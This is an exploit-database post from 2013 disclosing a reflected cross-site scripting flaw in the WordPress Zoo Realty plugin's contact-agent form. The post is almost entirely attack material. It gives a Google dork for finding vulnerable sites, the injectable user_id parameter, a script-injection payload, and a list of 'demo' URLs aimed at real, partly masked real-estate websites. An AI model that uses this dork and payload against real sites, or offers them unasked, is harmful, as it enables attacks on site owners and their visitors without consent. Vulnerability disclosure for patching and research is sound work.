Home / exploits Wordpress Zoo Realty Plugin Cross site scripting Vulnerability
Posted on 07 October 2013
############################# # Exploit Title : Wordpress Zoo Realty Plugin Cross site scripting Vulnerability # # Author : Ashiyane Digital Security Team # # Date: 2013/10/05 # # Vendor Homepage : http://wordpress.org # # Google Dork : inurl:wp-content/plugins/Realty/display/elements/form_contact_agent.php # ############## # Location : site//wp-content/plugins/Realty/display/elements/form_contact_agent.php?user_id=[xss]&popup=1 # # metod : Get # # Script for Test : "/><script>alert(1);</script> ############## # Demo: # # http://www.absXde.com.au/wp-content/plugins/Realty/display/elements/form_contact_agent.php?user_id=%22/%3E%3Cscript%3Ealert%281%29;%3C/script%3E&popup=1 # # http://www.aXm.au/wp-content/plugins/Realty/display/elements/form_contact_agent.php?user_id=%22/%3E%3Cscript%3Ealert%281%29;%3C/script%3E&popup=1 # # http://www.homeXnds.com.au/wp-content/plugins/Realty/display/elements/form_contact_agent.php?user_id=%22/%3E%3Cscript%3Ealert%281%29;%3C/script%3E&popup=1 # # http://www.newsXciesforsale.com.au/wp-content/plugins/Realty/display/elements/form_contact_agent.php?user_id=%22/%3E%3Cscript%3Ealert%281%29;%3C/script%3E&popup=1 # # http://www.planXoperties.com.au/wp-content/plugins/Realty/display/elements/form_contact_agent.php?user_id=%22/%3E%3Cscript%3Ealert%281%29;%3C/script%3E&popup=1 # ########################### # # Discovered By : ACC3SS # ###########################
